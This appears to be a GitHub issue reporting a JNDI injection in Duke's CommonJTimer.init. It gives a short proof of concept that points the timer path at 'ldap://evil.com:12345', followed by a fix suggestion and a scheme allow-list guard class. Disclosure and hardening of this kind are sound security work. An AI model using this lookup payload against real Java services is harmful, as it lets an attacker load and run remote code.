larsga / Duke

Duke is a fast and flexible deduplication engine written in Java
Apache License 2.0

There's a code injection vulnerability of `no.priv.garshol.duke.server.CommonJTimer.init` #273

Open LetianYuan opened 1 year ago

LetianYuan commented 1 year ago

**Affected Version**

The latest version 1.2 and below.

**Describe the vulnerability**

`no.priv.garshol.duke.server.CommonJTimer.init(Properties)` is designed to initialize a timer. However, passing an unchecked argument to this API can lead to the execution of arbitrary code. For instance, the following code will lead to the execution of arbitrary code from attackers:

```java
import java.util.Properties;
import no.priv.garshol.duke.server.CommonJTimer;

CommonJTimer timer = new CommonJTimer();
Properties timerProperties = new Properties();
// the JNDI path is taken from the properties and passed straight to lookup()
timerProperties.setProperty("duke.timer-jndipath", "ldap://evil.com:12345");
timer.init(timerProperties);
```

**To Reproduce**

Build an LDAP server that provides malicious code. Then executing the above code will reproduce it.

**Fix Suggestion**

Filter LDAP, RMI and related protocols when using lookup.
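One way to implement the filtering suggested above, as an added example that is neither Duke's own code nor the maintainers' fix: validate the configured JNDI name before it ever reaches `InitialContext.lookup()`, allowing only names in the local `java:` namespace (where an application server binds its CommonJ `TimerManager`) or bare relative names, and rejecting anything that carries a URL scheme such as `ldap:`, `ldaps:`, `rmi:`, `iiop:` or `dns:`. The class name `JndiNameGuard`, the helper names, the allow-listed `java:` prefix and the sample hosts are assumptions, not part of the project.

```java
// Added example, not Duke's own code: guard a JNDI name read from configuration
// before it is handed to InitialContext.lookup(). Helper names are assumptions.
import java.util.Locale;
import java.util.Properties;

public class JndiNameGuard {

    /**
     * Returns true only for names that cannot trigger a remote lookup:
     * either a bare name resolved against the initial context, or a name in
     * the local "java:" namespace. Any other "scheme:" prefix (ldap, ldaps,
     * rmi, iiop, dns, ...) is rejected, case-insensitively.
     */
    public static boolean isSafeJndiName(String name) {
        if (name == null) {
            return false;
        }
        String lower = name.trim().toLowerCase(Locale.ROOT);
        if (lower.isEmpty()) {
            return false;
        }
        int colon = lower.indexOf(':');
        if (colon < 0) {
            // No scheme at all: a plain relative name such as "tm/TimerManager".
            return true;
        }
        // Everything before the first ':' is treated as the scheme; only the
        // in-process "java" namespace is allowed.
        return lower.substring(0, colon).equals("java");
    }

    /**
     * Hardened way to read the timer path: the same property Duke uses, but
     * the value is validated and the process fails closed on a bad name.
     */
    public static String requireSafeTimerPath(Properties props) {
        String path = props.getProperty("duke.timer-jndipath");
        if (!isSafeJndiName(path)) {
            throw new IllegalArgumentException(
                "duke.timer-jndipath must be a local JNDI name, got: " + path);
        }
        return path.trim();
    }

    public static void main(String[] args) {
        // Constructed sample inputs; the hosts are placeholders, not real targets.
        String[] samples = {
            "java:comp/env/tm/TimerManager",      // typical CommonJ binding: allowed
            "tm/TimerManager",                    // relative name: allowed
            "ldap://placeholder.invalid:1389/x",  // remote LDAP: rejected
            "rmi://placeholder.invalid:1099/x",   // remote RMI: rejected
            "LDAPS://placeholder.invalid/x",      // mixed case: still rejected
            "",                                   // empty: rejected
        };
        for (String s : samples) {
            System.out.println("\"" + s + "\" -> "
                + (isSafeJndiName(s) ? "allowed" : "rejected"));
        }

        Properties bad = new Properties();
        bad.setProperty("duke.timer-jndipath", "ldap://placeholder.invalid:1389/x");
        try {
            requireSafeTimerPath(bad);
        } catch (IllegalArgumentException e) {
            System.out.println("rejected at init: " + e.getMessage());
        }
    }
}
```

The check is deliberately an allow-list on the scheme rather than a deny-list of known-bad protocols, so a provider the deny-list did not anticipate is still refused; the expected output of `main` is that only the first two samples print `allowed` and the bad `Properties` raises before any lookup happens.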